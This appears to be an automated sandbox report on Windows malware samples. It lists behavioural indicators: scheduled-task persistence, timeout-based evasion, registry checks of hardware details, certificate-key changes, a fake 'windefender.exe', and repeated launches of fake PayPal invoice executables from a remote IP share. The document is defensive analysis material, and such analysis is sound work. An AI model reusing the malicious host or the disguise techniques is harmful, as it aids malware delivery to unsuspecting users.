N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\2023-11-22-22\facc892bab57ba7b10fa2c6170577f45137ab714b4a0622187344e86dde0dac9.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\2023-11-22-22\ef74c4c21db18cfae6ef7ec3761c074d433f81945835613f0772c87c077cb137.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1000078001\hv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.114\scarica\InvoicePayPal.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\update\explorer.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe \??\UNC\62.173.141.116\scarica\paypal_inv.exe

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_MSFT&PROD_VIRTUAL_DISK\2&1F4ADFFE&0&000003 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000004\Service C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000005\HardwareID C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000005\Service C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_MSFT&PROD_VIRTUAL_DISK\2&1F4ADFFE&0&000004 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_MSFT&PROD_VIRTUAL_DISK\2&1F4ADFFE&0&000005 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000003\HardwareID C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000003\Service C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&1f4adffe&0&000004\HardwareID C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\2023-11-23-12\e9fdf47496f9c18b384c875b0ca6866df1074b2981e0ef95a4d9d01cb824b275.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\2023-11-22-22\7ee5c994ac006822269f3fe52d67cee97f5f80850451691a0bb721dc70169bae.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS5B40.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key created \Registry\User\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 C:\Windows\SysWOW64\help.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe N/A
Key created \REGISTRY\USER\.DEFAULT C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%SystemRoot%\System32\ndfapi.dll,-40001 = "Windows Network Diagnostics" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" C:\Windows\windefender.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\MUID\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1F927ADE-D054-3EEC-3838-31EC2C3651EB} {0C6C4200-C589-11D0-999A-00C04FD655E1} 0xFFFF = 0100000000000000166fca581f1eda01 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\DualEngineCacheContainerTracker C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\OpenWithProgids\mhtmlfile = "0" C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" C:\Windows\windefender.exe N/A
